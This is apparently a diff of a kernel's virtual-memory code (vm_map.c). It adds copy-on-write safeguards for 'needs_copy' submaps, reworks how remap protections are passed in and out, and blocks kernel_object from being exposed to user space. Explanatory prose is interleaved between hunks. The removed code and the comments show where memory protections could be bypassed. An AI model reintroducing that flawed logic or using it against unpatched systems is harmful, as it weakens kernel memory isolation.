@@ -6089,15 +5847,15 @@ vm_map_protect(
                kr = vm_map_remap(map,
                    &new_start,
                    end - start,
-                   0,               /* mask */
+                   0, /* mask */
                    VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE,
                    kflags,
                    0,
                    map,
                    start,
-                   TRUE,               /* copy-on-write remapping! */
-                   &cur_prot,
-                   &max_prot,
+                   TRUE, /* copy-on-write remapping! */
+                   &cur_prot, /* IN/OUT */
+                   &max_prot, /* IN/OUT */
                    VM_INHERIT_DEFAULT);
                if (kr != KERN_SUCCESS) {
                        return kr;
@@ -12424,16 +12182,16 @@ vm_map_copy_extract(
        vm_map_t                src_map,
        vm_map_address_t        src_addr,
        vm_map_size_t           len,
-       vm_prot_t               required_prot,
        boolean_t               do_copy,
        vm_map_copy_t           *copy_result,   /* OUT */
-       vm_prot_t               *cur_prot,      /* OUT */
-       vm_prot_t               *max_prot,      /* OUT */
+       vm_prot_t               *cur_prot,      /* IN/OUT */
+       vm_prot_t               *max_prot,      /* IN/OUT */
        vm_inherit_t            inheritance,
        vm_map_kernel_flags_t   vmk_flags)
 {
        vm_map_copy_t   copy;
        kern_return_t   kr;
+       vm_prot_t required_cur_prot, required_max_prot;
 
        /*
         *      Check for copies of zero bytes.
@@ -12455,6 +12213,9 @@ vm_map_copy_extract(
                DEBUG4K_SHARE("src_map %p src_addr 0x%llx src_end 0x%llx\n", src_map, (uint64_t)src_addr, (uint64_t)(src_addr + len));
        }
 
+       required_cur_prot = *cur_prot;
+       required_max_prot = *max_prot;
+
        /*
         *      Allocate a header element for the list.
         *
@@ -12474,19 +12235,20 @@ vm_map_copy_extract(
        kr = vm_map_remap_extract(src_map,
            src_addr,
            len,
-           required_prot,
-           do_copy,                       /* copy */
+           do_copy,             /* copy */
            &copy->cpy_hdr,
-           cur_prot,
-           max_prot,
+           cur_prot,            /* IN/OUT */
+           max_prot,            /* IN/OUT */
            inheritance,
            vmk_flags);
        if (kr != KERN_SUCCESS) {
                vm_map_copy_discard(copy);
                return kr;
        }
-       assert((*cur_prot & required_prot) == required_prot);
-       assert((*max_prot & required_prot) == required_prot);
+       if (required_cur_prot != VM_PROT_NONE) {
+               assert((*cur_prot & required_cur_prot) == required_cur_prot);
+               assert((*max_prot & required_max_prot) == required_max_prot);
+       }
 
        *copy_result = copy;
        return KERN_SUCCESS;
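With this change cur_prot/max_prot become IN/OUT: on entry they name the protections the caller requires (VM_PROT_NONE in both selects the legacy "report whatever the range allows" behaviour), and on return they hold the protections actually granted. A hedged sketch of the two calling conventions, with placeholder arguments:

vm_map_copy_t  copy;
vm_prot_t      cur, max;
kern_return_t  kr;

/* legacy mode: no requirement, learn the strictest protections found */
cur = VM_PROT_NONE;
max = VM_PROT_NONE;
kr = vm_map_copy_extract(src_map, addr, size, FALSE /* do_copy */,
    &copy, &cur, &max, VM_INHERIT_DEFAULT, vmk_flags);

/* new mode: require at least read/write on the whole range */
cur = VM_PROT_READ | VM_PROT_WRITE;
max = VM_PROT_READ | VM_PROT_WRITE;
kr = vm_map_copy_extract(src_map, addr, size, FALSE /* do_copy */,
    &copy, &cur, &max, VM_INHERIT_DEFAULT, vmk_flags);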
@@ -12921,7 +12683,7 @@ vm_map_fork(
 #endif /* PMAP_CREATE_FORCE_4K_PAGES */
        new_pmap = pmap_create_options(ledger, (vm_map_size_t) 0, pmap_flags);
 
-       vm_map_reference_swap(old_map);
+       vm_map_reference(old_map);
        vm_map_lock(old_map);
 
        map_create_options = 0;
@@ -13209,6 +12971,19 @@ vm_map_exec(
        return KERN_SUCCESS;
 }
 
+uint64_t vm_map_lookup_locked_copy_slowly_count = 0;
+uint64_t vm_map_lookup_locked_copy_slowly_size = 0;
+uint64_t vm_map_lookup_locked_copy_slowly_max = 0;
+uint64_t vm_map_lookup_locked_copy_slowly_restart = 0;
+uint64_t vm_map_lookup_locked_copy_slowly_error = 0;
+uint64_t vm_map_lookup_locked_copy_strategically_count = 0;
+uint64_t vm_map_lookup_locked_copy_strategically_size = 0;
+uint64_t vm_map_lookup_locked_copy_strategically_max = 0;
+uint64_t vm_map_lookup_locked_copy_strategically_restart = 0;
+uint64_t vm_map_lookup_locked_copy_strategically_error = 0;
+uint64_t vm_map_lookup_locked_copy_shadow_count = 0;
+uint64_t vm_map_lookup_locked_copy_shadow_size = 0;
+uint64_t vm_map_lookup_locked_copy_shadow_max = 0;
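The globals above count, size and track the maximum extent of the three copy paths vm_map_lookup_locked() can take when faulting through a copy-on-write submap (copy_slowly, copy_strategically, and shadow-object setup). No sysctl is wired up in this hunk; as a hedged example, on a development kernel they could be read from the debugger:

	(lldb) p vm_map_lookup_locked_copy_slowly_count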
 /*
  *     vm_map_lookup_locked:
  *
@@ -13262,6 +13037,7 @@ vm_map_lookup_locked(
        boolean_t                       mask_protections;
        boolean_t                       force_copy;
        boolean_t                       no_force_copy_if_executable;
+       boolean_t                       submap_needed_copy;
        vm_prot_t                       original_fault_type;
        vm_map_size_t                   fault_page_mask;
 
@@ -13324,6 +13100,7 @@ RetryLookup:
         *      returned locked.
         */
 
+       submap_needed_copy = FALSE;
 submap_recurse:
        if (entry->is_sub_map) {
                vm_map_offset_t         local_vaddr;
@@ -13384,6 +13161,9 @@ submap_recurse:
                                }
                        }
                } else {
+                       if (entry->needs_copy) {
+                               submap_needed_copy = TRUE;
+                       }
                        vm_map_lock_read(VME_SUBMAP(entry));
                        *var_map = VME_SUBMAP(entry);
                        /* leave map locked if it is a target */
@@ -13453,8 +13233,9 @@ RetrySubMap:
                        vm_object_offset_t copy_offset;
                        vm_map_offset_t local_start;
                        vm_map_offset_t local_end;
-                       boolean_t       copied_slowly = FALSE;
-                       vm_object_offset_t copied_slowly_phys_offset = 0;
+                       boolean_t       object_copied = FALSE;
+                       vm_object_offset_t object_copied_offset = 0;
+                       boolean_t       object_copied_needs_copy = FALSE;
                        kern_return_t   kr = KERN_SUCCESS;
 
                        if (vm_map_lock_read_to_write(map)) {
@@ -13492,38 +13273,38 @@ RetrySubMap:
                        /* an entry in our space to the underlying */
                        /* object in the submap, bypassing the  */
                        /* submap. */
-
-                       if (submap_entry->wired_count != 0 ||
-                           (sub_object->copy_strategy !=
-                           MEMORY_OBJECT_COPY_SYMMETRIC)) {
-                               if ((submap_entry->protection & VM_PROT_EXECUTE) &&
-                                   no_force_copy_if_executable) {
-//                                     printf("FBDP map %p entry %p start 0x%llx end 0x%llx wired %d strat %d\n", map, submap_entry, (uint64_t)local_start, (uint64_t)local_end, submap_entry->wired_count, sub_object->copy_strategy);
-                                       if ((cow_sub_map_parent) && (cow_sub_map_parent != map)) {
-                                               vm_map_unlock(cow_sub_map_parent);
-                                       }
-                                       if ((*real_map != map)
-                                           && (*real_map != cow_sub_map_parent)) {
-                                               vm_map_unlock(*real_map);
-                                       }
-                                       *real_map = map;
-                                       vm_map_lock_write_to_read(map);
-                                       kr = KERN_PROTECTION_FAILURE;
-                                       DTRACE_VM4(submap_no_copy_executable,
-                                           vm_map_t, map,
-                                           vm_object_offset_t, submap_entry_offset,
-                                           vm_object_size_t, submap_entry_size,
-                                           int, kr);
-                                       return kr;
+                       submap_entry_offset = VME_OFFSET(submap_entry);
+                       submap_entry_size = submap_entry->vme_end - submap_entry->vme_start;
+
+                       if ((submap_entry->wired_count != 0 ||
+                           sub_object->copy_strategy != MEMORY_OBJECT_COPY_SYMMETRIC) &&
+                           (submap_entry->protection & VM_PROT_EXECUTE) &&
+                           no_force_copy_if_executable) {
+//                             printf("FBDP map %p entry %p start 0x%llx end 0x%llx wired %d strat %d\n", map, submap_entry, (uint64_t)local_start, (uint64_t)local_end, submap_entry->wired_count, sub_object->copy_strategy);
+                               if ((cow_sub_map_parent) && (cow_sub_map_parent != map)) {
+                                       vm_map_unlock(cow_sub_map_parent);
+                               }
+                               if ((*real_map != map)
+                                   && (*real_map != cow_sub_map_parent)) {
+                                       vm_map_unlock(*real_map);
                                }
+                               *real_map = map;
+                               vm_map_lock_write_to_read(map);
+                               kr = KERN_PROTECTION_FAILURE;
+                               DTRACE_VM4(submap_no_copy_executable,
+                                   vm_map_t, map,
+                                   vm_object_offset_t, submap_entry_offset,
+                                   vm_object_size_t, submap_entry_size,
+                                   int, kr);
+                               return kr;
+                       }
 
+                       if (submap_entry->wired_count != 0) {
                                vm_object_reference(sub_object);
 
                                assertf(VM_MAP_PAGE_ALIGNED(VME_OFFSET(submap_entry), VM_MAP_PAGE_MASK(map)),
                                    "submap_entry %p offset 0x%llx\n",
                                    submap_entry, VME_OFFSET(submap_entry));
-                               submap_entry_offset = VME_OFFSET(submap_entry);
-                               submap_entry_size = submap_entry->vme_end - submap_entry->vme_start;
 
                                DTRACE_VM6(submap_copy_slowly,
                                    vm_map_t, cow_sub_map_parent,
@@ -13544,9 +13325,11 @@ RetrySubMap:
                                    submap_entry_size,
                                    FALSE,
                                    &copy_object);
-                               copied_slowly = TRUE;
+                               object_copied = TRUE;
+                               object_copied_offset = 0;
                                /* 4k: account for extra offset in physical page */
-                               copied_slowly_phys_offset = submap_entry_offset - vm_object_trunc_page(submap_entry_offset);
+                               object_copied_offset += submap_entry_offset - vm_object_trunc_page(submap_entry_offset);
+                               object_copied_needs_copy = FALSE;
                                vm_object_deallocate(sub_object);
 
                                vm_map_lock(map);
@@ -13564,11 +13347,12 @@ RetrySubMap:
                                        vm_object_deallocate(copy_object);
                                        copy_object = VM_OBJECT_NULL;
                                        vm_map_lock_write_to_read(map);
-                                       DTRACE_VM4(submap_copy_slowly,
+                                       DTRACE_VM4(submap_copy_error_slowly,
                                            vm_object_t, sub_object,
                                            vm_object_offset_t, submap_entry_offset,
                                            vm_object_size_t, submap_entry_size,
                                            int, kr);
+                                       vm_map_lookup_locked_copy_slowly_error++;
                                        return kr;
                                }
 
@@ -13582,10 +13366,73 @@ RetrySubMap:
                                        vm_object_deallocate(copy_object);
                                        copy_object = VM_OBJECT_NULL;
                                        vm_map_lock_write_to_read(map);
+                                       vm_map_lookup_locked_copy_slowly_restart++;
+                                       goto RetrySubMap;
+                               }
+                               vm_map_lookup_locked_copy_slowly_count++;
+                               vm_map_lookup_locked_copy_slowly_size += submap_entry_size;
+                               if (submap_entry_size > vm_map_lookup_locked_copy_slowly_max) {
+                                       vm_map_lookup_locked_copy_slowly_max = submap_entry_size;
+                               }
+                       } else if (sub_object->copy_strategy != MEMORY_OBJECT_COPY_SYMMETRIC) {
+                               submap_entry_offset = VME_OFFSET(submap_entry);
+                               copy_object = VM_OBJECT_NULL;
+                               object_copied_offset = submap_entry_offset;
+                               object_copied_needs_copy = FALSE;
+                               DTRACE_VM6(submap_copy_strategically,
+                                   vm_map_t, cow_sub_map_parent,
+                                   vm_map_offset_t, vaddr,
+                                   vm_map_t, map,
+                                   vm_object_size_t, submap_entry_size,
+                                   int, submap_entry->wired_count,
+                                   int, sub_object->copy_strategy);
+                               kr = vm_object_copy_strategically(
+                                       sub_object,
+                                       submap_entry_offset,
+                                       submap_entry->vme_end - submap_entry->vme_start,
+                                       &copy_object,
+                                       &object_copied_offset,
+                                       &object_copied_needs_copy);
+                               if (kr == KERN_MEMORY_RESTART_COPY) {
+                                       old_start -= start_delta;
+                                       old_end += end_delta;
+                                       vm_object_deallocate(copy_object);
+                                       copy_object = VM_OBJECT_NULL;
+                                       vm_map_lock_write_to_read(map);
+                                       vm_map_lookup_locked_copy_strategically_restart++;
                                        goto RetrySubMap;
                                }
+                               if (kr != KERN_SUCCESS) {
+                                       if ((cow_sub_map_parent) && (cow_sub_map_parent != map)) {
+                                               vm_map_unlock(cow_sub_map_parent);
+                                       }
+                                       if ((*real_map != map)
+                                           && (*real_map != cow_sub_map_parent)) {
+                                               vm_map_unlock(*real_map);
+                                       }
+                                       *real_map = map;
+                                       vm_object_deallocate(copy_object);
+                                       copy_object = VM_OBJECT_NULL;
+                                       vm_map_lock_write_to_read(map);
+                                       DTRACE_VM4(submap_copy_error_strategically,
+                                           vm_object_t, sub_object,
+                                           vm_object_offset_t, submap_entry_offset,
+                                           vm_object_size_t, submap_entry_size,
+                                           int, kr);
+                                       vm_map_lookup_locked_copy_strategically_error++;
+                                       return kr;
+                               }
+                               assert(copy_object != VM_OBJECT_NULL);
+                               assert(copy_object != sub_object);
+                               object_copied = TRUE;
+                               vm_map_lookup_locked_copy_strategically_count++;
+                               vm_map_lookup_locked_copy_strategically_size += submap_entry_size;
+                               if (submap_entry_size > vm_map_lookup_locked_copy_strategically_max) {
+                                       vm_map_lookup_locked_copy_strategically_max = submap_entry_size;
+                               }
                        } else {
                                /* set up shadow object */
+                               object_copied = FALSE;
                                copy_object = sub_object;
                                vm_object_lock(sub_object);
                                vm_object_reference_locked(sub_object);
@@ -13617,6 +13464,11 @@ RetrySubMap:
                                        VM_MAP_PAGE_SIZE(map),
                                        submap_entry->vme_start,
                                        prot);
+                               vm_map_lookup_locked_copy_shadow_count++;
+                               vm_map_lookup_locked_copy_shadow_size += submap_entry_size;
+                               if (submap_entry_size > vm_map_lookup_locked_copy_shadow_max) {
+                                       vm_map_lookup_locked_copy_shadow_max = submap_entry_size;
+                               }
                        }
 
                        /*
@@ -13664,7 +13516,7 @@ RetrySubMap:
                                    uint64_t, (uint64_t)entry->vme_start,
                                    uint64_t, (uint64_t)entry->vme_end,
                                    vm_map_offset_t, vaddr,
-                                   int, copied_slowly);
+                                   int, object_copied);
                                return KERN_INVALID_ADDRESS;
                        }
 
@@ -13754,17 +13606,16 @@ RetrySubMap:
                                entry->protection &= ~VM_PROT_EXECUTE;
                        }
 
-                       if (copied_slowly) {
-                               VME_OFFSET_SET(entry, local_start - old_start + copied_slowly_phys_offset);
-                               entry->needs_copy = FALSE;
+                       if (object_copied) {
+                               VME_OFFSET_SET(entry, local_start - old_start + object_copied_offset);
+                               entry->needs_copy = object_copied_needs_copy;
                                entry->is_shared = FALSE;
                        } else {
-                               VME_OFFSET_SET(entry, copy_offset);
+                               assert(VME_OBJECT(entry) != VM_OBJECT_NULL);
+                               assert(VME_OBJECT(entry)->copy_strategy == MEMORY_OBJECT_COPY_SYMMETRIC);
                                assert(entry->wired_count == 0);
+                               VME_OFFSET_SET(entry, copy_offset);
                                entry->needs_copy = TRUE;
-                               if (entry->inheritance == VM_INHERIT_SHARE) {
-                                       entry->inheritance = VM_INHERIT_COPY;
-                               }
                                if (map != old_map) {
                                        entry->is_shared = TRUE;
                                }
@@ -13883,6 +13734,19 @@ protection_failure:
                }
        }
 
+       if (submap_needed_copy && (prot & VM_PROT_WRITE)) {
+               /*
+                * We went through a "needs_copy" submap without triggering
+                * a copy, so granting write access to the page would bypass
+                * that submap's "needs_copy".
+                */
+               assert(!(fault_type & VM_PROT_WRITE));
+               assert(!*wired);
+               assert(!force_copy);
+               // printf("FBDP %d[%s] submap_needed_copy for %p 0x%llx\n", proc_selfpid(), proc_name_address(current_task()->bsd_info), map, vaddr);
+               prot &= ~VM_PROT_WRITE;
+       }
+
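The added check strips write permission when the lookup traversed a "needs_copy" submap without actually copying: handing back a writable page there would bypass the submap's copy-on-write semantics. A reduced model of the effect (illustrative only): the eventual write access re-faults with VM_PROT_WRITE, and that second fault performs the copy.

static vm_prot_t
effective_prot(vm_prot_t prot, boolean_t traversed_needs_copy_submap)
{
	if (traversed_needs_copy_submap) {
		prot &= ~VM_PROT_WRITE;   /* force the later write to fault and copy */
	}
	return prot;
}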
        /*
         *      Create an object if necessary.
         */
@@ -14065,6 +13929,7 @@ vm_map_region_recurse_64(
        vm_region_submap_short_info_64_t short_info;
        boolean_t                       do_region_footprint;
        int                             effective_page_size, effective_page_shift;
+       boolean_t                       submap_needed_copy;
 
        if (map == VM_MAP_NULL) {
                /* no address space to work on */
@@ -14105,6 +13970,7 @@ vm_map_region_recurse_64(
 
        user_address = *address;
        user_max_depth = *nesting_depth;
+       submap_needed_copy = FALSE;
 
        if (not_in_kdp) {
                vm_map_lock_read(map);
@@ -14241,6 +14107,11 @@ recurse_again:
                 * Get down to the next submap level.
                 */
 
+               if (curr_entry->needs_copy) {
+                       /* everything below this is effectively copy-on-write */
+                       submap_needed_copy = TRUE;
+               }
+
                /*
                 * Lock the next level and unlock the current level,
                 * unless we need to keep it locked to access the "next_entry"
@@ -14318,6 +14189,9 @@ recurse_again:
                                submap_info->shadow_depth = 0;
                                submap_info->external_pager = 0;
                                submap_info->share_mode = SM_PRIVATE;
+                               if (submap_needed_copy) {
+                                       submap_info->share_mode = SM_COW;
+                               }
                                submap_info->is_submap = 0;
                                submap_info->behavior = VM_BEHAVIOR_DEFAULT;
                                submap_info->object_id = VM_OBJECT_ID_FAKE(map, task_ledgers.purgeable_nonvolatile);
@@ -14336,6 +14210,9 @@ recurse_again:
                                short_info->external_pager = 0;
                                short_info->shadow_depth = 0;
                                short_info->share_mode = SM_PRIVATE;
+                               if (submap_needed_copy) {
+                                       short_info->share_mode = SM_COW;
+                               }
                                short_info->ref_count = 1;
                        }
                        *nesting_depth = 0;
@@ -14444,6 +14321,9 @@ recurse_again:
                            extended.share_mode == SM_SHARED) {
                                extended.share_mode = SM_PRIVATE;
                        }
+                       if (submap_needed_copy) {
+                               extended.share_mode = SM_COW;
+                       }
                } else {
                        if (curr_entry->use_pmap) {
                                extended.share_mode = SM_TRUESHARED;
@@ -15160,8 +15040,6 @@ vm_map_simplify_entry(
 {
        vm_map_entry_t  prev_entry;
 
-       counter(c_vm_map_simplify_entry_called++);
-
        prev_entry = this_entry->vme_prev;
 
        if ((this_entry != vm_map_to_entry(map)) &&
@@ -15228,7 +15106,6 @@ vm_map_simplify_entry(
                }
                vm_map_entry_dispose(map, prev_entry);
                SAVE_HINT_MAP_WRITE(map, this_entry);
-               counter(c_vm_map_simplified++);
        }
 }
 
@@ -15244,7 +15121,6 @@ vm_map_simplify(
                vm_map_simplify_entry(map, this_entry);
                vm_map_simplify_entry(map, this_entry->vme_next);
        }
-       counter(c_vm_map_simplify_called++);
        vm_map_unlock(map);
 }
 
@@ -15807,8 +15683,6 @@ vm_map_entry_is_reusable(
                object->shadow == VM_OBJECT_NULL &&
                object->internal &&
                object->purgable == VM_PURGABLE_DENY &&
-               object->copy_strategy != MEMORY_OBJECT_COPY_DELAY &&
-               !object->true_share &&
                object->wimg_bits == VM_WIMG_USE_DEFAULT &&
                !object->code_signed) {
                return TRUE;
@@ -16332,8 +16206,6 @@ vm_map_entry_insert(
        return new_entry;
 }
 
-int vm_remap_old_path = 0;
-int vm_remap_new_path = 0;
 /*
  *     Routine:        vm_map_remap_extract
  *
@@ -16344,11 +16216,10 @@ vm_map_remap_extract(
        vm_map_t                map,
        vm_map_offset_t         addr,
        vm_map_size_t           size,
-       vm_prot_t               required_protection,
        boolean_t               copy,
        struct vm_map_header    *map_header,
-       vm_prot_t               *cur_protection,
-       vm_prot_t               *max_protection,
+       vm_prot_t               *cur_protection,   /* IN/OUT */
+       vm_prot_t               *max_protection,   /* IN/OUT */
        /* What, no behavior? */
        vm_inherit_t            inheritance,
        vm_map_kernel_flags_t   vmk_flags)
@@ -16371,6 +16242,8 @@ vm_map_remap_extract(
        vm_prot_t               max_prot_for_prot_copy;
        vm_map_offset_t         effective_page_mask;
        boolean_t               pageable, same_map;
+       boolean_t               vm_remap_legacy;
+       vm_prot_t               required_cur_prot, required_max_prot;
 
        pageable = vmk_flags.vmkf_copy_pageable;
        same_map = vmk_flags.vmkf_copy_same_map;
@@ -16383,7 +16256,9 @@ vm_map_remap_extract(
        assert(inheritance == VM_INHERIT_NONE ||
            inheritance == VM_INHERIT_COPY ||
            inheritance == VM_INHERIT_SHARE);
-       assert(!(required_protection & ~VM_PROT_ALL));
+       assert(!(*cur_protection & ~VM_PROT_ALL));
+       assert(!(*max_protection & ~VM_PROT_ALL));
+       assert((*cur_protection & *max_protection) == *cur_protection);
 
        /*
         *      Compute start and end of region.
@@ -16405,12 +16280,52 @@ vm_map_remap_extract(
        vm_map_store_init( map_header );
 
        if (copy && vmk_flags.vmkf_remap_prot_copy) {
+               /*
+                * Special case for vm_map_protect(VM_PROT_COPY):
+                * we want to set the new mappings' max protection to the
+                * specified *max_protection...
+                */
                max_prot_for_prot_copy = *max_protection & VM_PROT_ALL;
+               /* ... but we want to use the vm_remap() legacy mode */
+               *max_protection = VM_PROT_NONE;
+               *cur_protection = VM_PROT_NONE;
        } else {
                max_prot_for_prot_copy = VM_PROT_NONE;
        }
-       *cur_protection = VM_PROT_ALL;
-       *max_protection = VM_PROT_ALL;
+
+       if (*cur_protection == VM_PROT_NONE &&
+           *max_protection == VM_PROT_NONE) {
+               /*
+                * vm_remap() legacy mode:
+                * Extract all memory regions in the specified range and
+                * collect the strictest set of protections allowed on the
+                * entire range, so the caller knows what they can do with
+                * the remapped range.
+                * We start with VM_PROT_ALL and we'll remove the protections
+                * missing from each memory region.
+                */
+               vm_remap_legacy = TRUE;
+               *cur_protection = VM_PROT_ALL;
+               *max_protection = VM_PROT_ALL;
+               required_cur_prot = VM_PROT_NONE;
+               required_max_prot = VM_PROT_NONE;
+       } else {
+               /*
+                * vm_remap_new() mode:
+                * Extract all memory regions in the specified range and
+                * ensure that they have at least the protections specified
+                * by the caller via *cur_protection and *max_protection.
+                * The resulting mapping should have these protections.
+                */
+               vm_remap_legacy = FALSE;
+               if (copy) {
+                       required_cur_prot = VM_PROT_NONE;
+                       required_max_prot = VM_PROT_READ;
+               } else {
+                       required_cur_prot = *cur_protection;
+                       required_max_prot = *max_protection;
+               }
+       }
 
        map_address = 0;
        mapped_size = 0;
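vm_map_remap_extract() now has two modes selected by the incoming protections. With both *cur_protection and *max_protection set to VM_PROT_NONE it behaves like the legacy vm_remap(): it collects the strictest protections found across the range and reports them back. With non-NONE inputs (the vm_remap_new() path) every extracted entry must already allow at least the requested protections, and the new mapping is created with exactly those. A reduced model of the mode selection, for illustration only:

static boolean_t
remap_is_legacy_mode(vm_prot_t *cur, vm_prot_t *max)
{
	if (*cur == VM_PROT_NONE && *max == VM_PROT_NONE) {
		/* legacy: start from ALL and narrow to what is actually found */
		*cur = VM_PROT_ALL;
		*max = VM_PROT_ALL;
		return TRUE;
	}
	/* new mode: the caller's protections are a hard requirement */
	return FALSE;
}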
@@ -16460,9 +16375,10 @@ vm_map_remap_extract(
                        vm_map_t submap;
                        vm_map_offset_t submap_start;
                        vm_map_size_t submap_size;
+                       boolean_t submap_needs_copy;
 
                        /*
-                        * No check for "required_protection" on "src_entry"
+                        * No check for "required protection" on "src_entry"
                         * because the protections that matter are the ones
                         * on the submap's VM map entry, which will be checked
                         * during the call to vm_map_remap_extract() below.
@@ -16473,14 +16389,57 @@ vm_map_remap_extract(
                        }
                        submap_start = VME_OFFSET(src_entry) + src_start - src_entry->vme_start;
                        submap = VME_SUBMAP(src_entry);
+                       if (copy) {
+                               /*
+                                * The caller wants a copy-on-write re-mapping,
+                                * so let's extract from the submap accordingly.
+                                */
+                               submap_needs_copy = TRUE;
+                       } else if (src_entry->needs_copy) {
+                               /*
+                                * The caller wants a shared re-mapping but the
+                                * submap is mapped with "needs_copy", so its
+                                * contents can't be shared as is. Extract the
+                                * contents of the submap as "copy-on-write".
+                                * The re-mapping won't be shared with the
+                                * original mapping but this is equivalent to
+                                * what happened with the original "remap from
+                                * submap" code.
+                                * The shared region is mapped "needs_copy", for
+                                * example.
+                                */
+                               submap_needs_copy = TRUE;
+                       } else {
+                               /*
+                                * The caller wants a shared re-mapping and
+                                * this mapping can be shared (no "needs_copy"),
+                                * so let's extract from the submap accordingly.
+                                * Kernel submaps are mapped without
+                                * "needs_copy", for example.
+                                */
+                               submap_needs_copy = FALSE;
+                       }
                        vm_map_reference(submap);
                        vm_map_unlock(map);
                        src_entry = NULL;
+                       if (vm_remap_legacy) {
+                               *cur_protection = VM_PROT_NONE;
+                               *max_protection = VM_PROT_NONE;
+                       }
+
+                       DTRACE_VM7(remap_submap_recurse,
+                           vm_map_t, map,
+                           vm_map_offset_t, addr,
+                           vm_map_size_t, size,
+                           boolean_t, copy,
+                           vm_map_offset_t, submap_start,
+                           vm_map_size_t, submap_size,
+                           boolean_t, submap_needs_copy);
+
                        result = vm_map_remap_extract(submap,
                            submap_start,
                            submap_size,
-                           required_protection,
-                           copy,
+                           submap_needs_copy,
                            map_header,
                            cur_protection,
                            max_protection,
@@ -16490,8 +16449,12 @@ vm_map_remap_extract(
                        return result;
                }
 
-               if ((src_entry->protection & required_protection)
-                   != required_protection) {
+               if (src_entry->is_sub_map) {
+                       /* protections for submap mapping are irrelevant here */
+               } else if (((src_entry->protection & required_cur_prot) !=
+                   required_cur_prot) ||
+                   ((src_entry->max_protection & required_max_prot) !=
+                   required_max_prot)) {
                        if (vmk_flags.vmkf_copy_single_object &&
                            mapped_size != 0) {
                                /*
@@ -16514,18 +16477,16 @@ vm_map_remap_extract(
                        break;
                }
 
-               if (src_entry->is_sub_map &&
-                   VM_MAP_PAGE_SHIFT(VME_SUBMAP(src_entry)) < PAGE_SHIFT) {
+               if (src_entry->is_sub_map) {
                        vm_map_t submap;
                        vm_map_offset_t submap_start;
                        vm_map_size_t submap_size;
                        vm_map_copy_t submap_copy;
                        vm_prot_t submap_curprot, submap_maxprot;
-
-                       vm_remap_new_path++;
+                       boolean_t submap_needs_copy;
 
                        /*
-                        * No check for "required_protection" on "src_entry"
+                        * No check for "required protection" on "src_entry"
                         * because the protections that matter are the ones
                         * on the submap's VM map entry, which will be checked
                         * during the call to vm_map_copy_extract() below.
@@ -16537,16 +16498,47 @@ vm_map_remap_extract(
                        submap = VME_SUBMAP(src_entry);
                        submap_start = VME_OFFSET(src_entry) + src_start - src_entry->vme_start;
                        submap_size = tmp_size;
+                       if (copy) {
+                               /*
+                                * The caller wants a copy-on-write re-mapping,
+                                * so let's extract from the submap accordingly.
+                                */
+                               submap_needs_copy = TRUE;
+                       } else if (src_entry->needs_copy) {
+                               /*
+                                * The caller wants a shared re-mapping but the
+                                * submap is mapped with "needs_copy", so its
+                                * contents can't be shared as is. Extract the
+                                * contents of the submap as "copy-on-write".
+                                * The re-mapping won't be shared with the
+                                * original mapping but this is equivalent to
+                                * what happened with the original "remap from
+                                * submap" code.
+                                * The shared region is mapped "needs_copy", for
+                                * example.
+                                */
+                               submap_needs_copy = TRUE;
+                       } else {
+                               /*
+                                * The caller wants a shared re-mapping and
+                                * this mapping can be shared (no "needs_copy"),
+                                * so let's extract from the submap accordingly.
+                                * Kernel submaps are mapped without
+                                * "needs_copy", for example.
+                                */
+                               submap_needs_copy = FALSE;
+                       }
                        /* extra ref to keep submap alive */
                        vm_map_reference(submap);
 
-                       DTRACE_VM6(remap_submap_recurse,
+                       DTRACE_VM7(remap_submap_recurse,
                            vm_map_t, map,
                            vm_map_offset_t, addr,
                            vm_map_size_t, size,
                            boolean_t, copy,
                            vm_map_offset_t, submap_start,
-                           vm_map_size_t, submap_size);
+                           vm_map_size_t, submap_size,
+                           boolean_t, submap_needs_copy);
 
                        /*
                         * The map can be safely unlocked since we
@@ -16560,11 +16552,21 @@ vm_map_remap_extract(
                        vm_map_unlock(map);
                        src_entry = NULL; /* not valid once map is unlocked */
 
+                       if (vm_remap_legacy) {
+                               submap_curprot = VM_PROT_NONE;
+                               submap_maxprot = VM_PROT_NONE;
+                               if (max_prot_for_prot_copy) {
+                                       submap_maxprot = max_prot_for_prot_copy;
+                               }
+                       } else {
+                               assert(!max_prot_for_prot_copy);
+                               submap_curprot = *cur_protection;
+                               submap_maxprot = *max_protection;
+                       }
                        result = vm_map_copy_extract(submap,
                            submap_start,
                            submap_size,
-                           required_protection,
-                           copy,
+                           submap_needs_copy,
                            &submap_copy,
                            &submap_curprot,
                            &submap_maxprot,
@@ -16588,6 +16590,26 @@ vm_map_remap_extract(
 
                                copy_entry = vm_map_copy_first_entry(submap_copy);
                                assert(!copy_entry->is_sub_map);
+                               object = VME_OBJECT(copy_entry);
+
+                               /*
+                                * Prevent kernel_object from being exposed to
+                                * user space.
+                                */
+                               if (__improbable(object == kernel_object)) {
+                                       printf("%d[%s]: rejecting attempt to extract from kernel_object\n",
+                                           proc_selfpid(),
+                                           (current_task()->bsd_info
+                                           ? proc_name_address(current_task()->bsd_info)
+                                           : "?"));
+                                       DTRACE_VM(extract_kernel_only);
+                                       result = KERN_INVALID_RIGHT;
+                                       vm_map_copy_discard(submap_copy);
+                                       submap_copy = VM_MAP_COPY_NULL;
+                                       vm_map_lock(map);
+                                       break;
+                               }
+
                                vm_map_copy_entry_unlink(submap_copy, copy_entry);
                                copy_entry_size = copy_entry->vme_end - copy_entry->vme_start;
                                copy_entry->vme_start = map_address;
@@ -16603,24 +16625,32 @@ vm_map_remap_extract(
                        /* done with submap_copy */
                        vm_map_copy_discard(submap_copy);
 
-                       *cur_protection &= submap_curprot;
-                       *max_protection &= submap_maxprot;
+                       if (vm_remap_legacy) {
+                               *cur_protection &= submap_curprot;
+                               *max_protection &= submap_maxprot;
+                       }
 
                        /* re-acquire the map lock and continue to next entry */
                        vm_map_lock(map);
                        continue;
-               } else if (src_entry->is_sub_map) {
-                       vm_remap_old_path++;
-                       DTRACE_VM4(remap_submap,
-                           vm_map_t, map,
-                           vm_map_offset_t, addr,
-                           vm_map_size_t, size,
-                           boolean_t, copy);
-
-                       vm_map_reference(VME_SUBMAP(src_entry));
-                       object = VM_OBJECT_NULL;
                } else {
                        object = VME_OBJECT(src_entry);
+
+                       /*
+                        * Prevent kernel_object from being exposed to
+                        * user space.
+                        */
+                       if (__improbable(object == kernel_object)) {
+                               printf("%d[%s]: rejecting attempt to extract from kernel_object\n",
+                                   proc_selfpid(),
+                                   (current_task()->bsd_info
+                                   ? proc_name_address(current_task()->bsd_info)
+                                   : "?"));
+                               DTRACE_VM(extract_kernel_only);
+                               result = KERN_INVALID_RIGHT;
+                               break;
+                       }
+
                        if (src_entry->iokit_acct) {
